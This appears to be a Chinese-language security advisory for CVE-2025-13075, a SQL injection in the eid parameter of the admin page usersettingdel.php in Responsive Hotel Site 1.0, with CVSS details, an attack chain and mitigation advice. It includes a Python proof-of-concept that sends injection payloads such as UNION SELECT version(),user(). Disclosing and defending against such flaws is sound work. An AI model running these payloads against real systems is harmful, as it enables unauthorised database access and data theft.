CVE-2025-13075 Responsive Hotel Site 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13075

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Responsive Hotel Site 1.0

漏洞概述

CVE-2025-13075是code-projects开源项目Responsive Hotel Site 1.0版本中的一个中等严重性安全漏洞。该漏洞存在于管理后台的usersettingdel.php文件中，由于对用户输入参数eid缺乏有效的输入验证和参数化查询处理，导致应用程序存在SQL注入风险。攻击者可以通过构造恶意SQL语句，利用该漏洞未经授权访问、修改或删除数据库中的敏感信息，包括用户账户数据、酒店预订记录、客户个人信息等。由于该漏洞需要高权限认证（PR:H）才能利用，攻击面相对受限，但一旦被利用将对系统的数据完整性和机密性造成严重影响。该漏洞已于2025年11月12日公开披露，CVSS评分4.7，属于中危级别漏洞。建议受影响用户尽快采取修复措施，避免敏感数据泄露风险。

技术细节

该SQL注入漏洞位于Responsive Hotel Site 1.0的管理面板文件/admin/usersettingdel.php中。漏洞产生的根本原因是在处理eid参数时，直接将用户输入拼接到SQL查询语句中，未采用参数化查询或预编译语句进行数据库操作。攻击者可以通过HTTP请求中的eid参数注入任意SQL代码，如使用UNION SELECT语句获取数据库版本信息、用户表结构或其他敏感数据，或使用DELETE语句破坏数据库完整性。由于该漏洞需要高权限认证，攻击者需要先获取管理员账户或利用其他认证绕过漏洞。CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但需要高权限认证（PR:H），对机密性、完整性和可用性均造成低影响（C:L/I:L/A:L）。攻击者可通过构造如eid=1' OR '1'='1类型的Payload实现未授权数据库操作。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用Responsive Hotel Site 1.0，并定位到管理后台/admin/usersettingdel.php文件

STEP 2

步骤2

攻击者获取管理员账户访问权限（通过社会工程学、暴力破解或其他漏洞）

STEP 3

步骤3

攻击者构造恶意SQL注入Payload，通过eid参数提交到usersettingdel.php

STEP 4

步骤4

服务器将恶意SQL代码拼接到查询语句中执行，导致未授权数据库操作

STEP 5

步骤5

攻击者提取敏感数据（用户信息、预订记录等）或修改/删除数据库内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13075 SQL Injection PoC
# Target: Responsive Hotel Site 1.0
# File: /admin/usersettingdel.php
# Parameter: eid

def exploit_sqli(target_url, eid_payload):
    """
    Exploit SQL injection vulnerability in usersettingdel.php
    """
    # Construct the vulnerable URL
    exploit_url = f"{target_url}/admin/usersettingdel.php"
    
    # SQL injection payload
    params = {
        'eid': eid_payload
    }
    
    print(f"[*] Target: {exploit_url}")
    print(f"[*] Payload: {eid_payload}")
    
    try:
        response = requests.get(exploit_url, params=params, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        # Check for SQL error indicators
        if 'sql' in response.text.lower() or 'error' in response.text.lower():
            print("[!] SQL Error detected - vulnerability confirmed")
            print("[+] Response snippet:", response.text[:500])
        else:
            print("[*] No obvious SQL errors in response")
            
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

# Example payloads
if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://localhost/hotel"
    
    # Basic SQL injection test
    payloads = [
        "1",
        "1'",
        "1' OR '1'='1",
        "1' UNION SELECT NULL--",
        "1' UNION SELECT version(),user()--"
    ]
    
    for payload in payloads:
        print(f"\n[>] Testing payload: {payload}")
        exploit_sqli(target, payload)

影响范围

code-projects Responsive Hotel Site 1.0

防御指南

临时缓解措施

在官方修复方案发布前，建议采取以下临时缓解措施：1)限制管理后台访问IP，仅允许可信IP访问；2)启用Web应用防火墙规则拦截SQL注入特征；3)对数据库账户进行权限限制，撤销不必要的DELETE等高危操作权限；4)加强管理员账户密码策略，定期更换密码；5)启用数据库操作日志审计，及时发现异常查询行为；6)考虑暂时关闭或限制usersettingdel.php文件的访问功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13075
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13075
3 Details https://www.cvedetails.com/cve/CVE-2025-13075/
4 VulDB https://vuldb.com/cve/CVE-2025-13075
5 Link https://code-projects.org/
6 Link https://github.com/zhizi1234/cve/blob/main/tmp69/tmp69/report.md
7 Link https://vuldb.com/?ctiid.332206
8 Link https://vuldb.com/?id.332206
9 Link https://vuldb.com/?submit.682856
10 Link https://github.com/zhizi1234/cve/blob/main/tmp69/tmp69/report.md